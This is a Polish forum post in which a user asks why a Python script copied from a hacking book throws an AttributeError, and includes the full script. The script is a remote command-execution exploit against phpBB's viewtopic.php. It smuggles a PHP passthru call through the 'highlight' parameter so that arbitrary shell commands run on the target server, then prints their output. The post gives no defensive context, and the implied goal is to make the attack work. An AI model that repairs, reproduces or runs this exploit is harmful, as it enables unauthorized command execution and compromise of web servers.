Przepisalem ponizszy kod z ksiazki o hackingu i uruchamiam go ale dostaje takie bledy:

Kod:
 File "C:\Documents and Settings\Kacper\Pulpit\Informacje\Python\exploit.py", l
ine 17, in ?
  data = urllib.urlopen(url)
 File "C:\Python23\lib\urllib.py", line 76, in urlopen
  return opener.open(url)
 File "C:\Python23\lib\urllib.py", line 154, in open
  fullurl = unwrap(toBytes(fullurl))
 File "C:\Python23\lib\urllib.py", line 945, in unwrap
  url = url.strip()
AttributeError: 'list' object has no attribute 'strip'
Kod:
Kod:
import urllib
import sys

host = sys.argv
numer = sys.argv
komenda = sys.argv

url = host
url += "/viewtopic.php?t="
url += numer
url += "&cmd="
url += urllib.quote("echo POCZATEK; %s; echo KONIEC"%komenda)
url += "&highlight=%2527"
url += urllib.quote(".passthru(@_GET[cmd]).")
url += "%2527"

data = urllib.urlopen(url)

drukuj = 0

for line in data.readlines():
  if line.find("KONIEC")!= -1:
    drukuj = 0
    print "~~~~~~KONIEC~~~~~~"
    break
  if line.find("POCZATEK")!= -1:
    drukuj = 1
    print "~~~~~~WYNIK~~~~~~"
    continue
  if drukuj:
    line = line.replace("\n", "")
    print line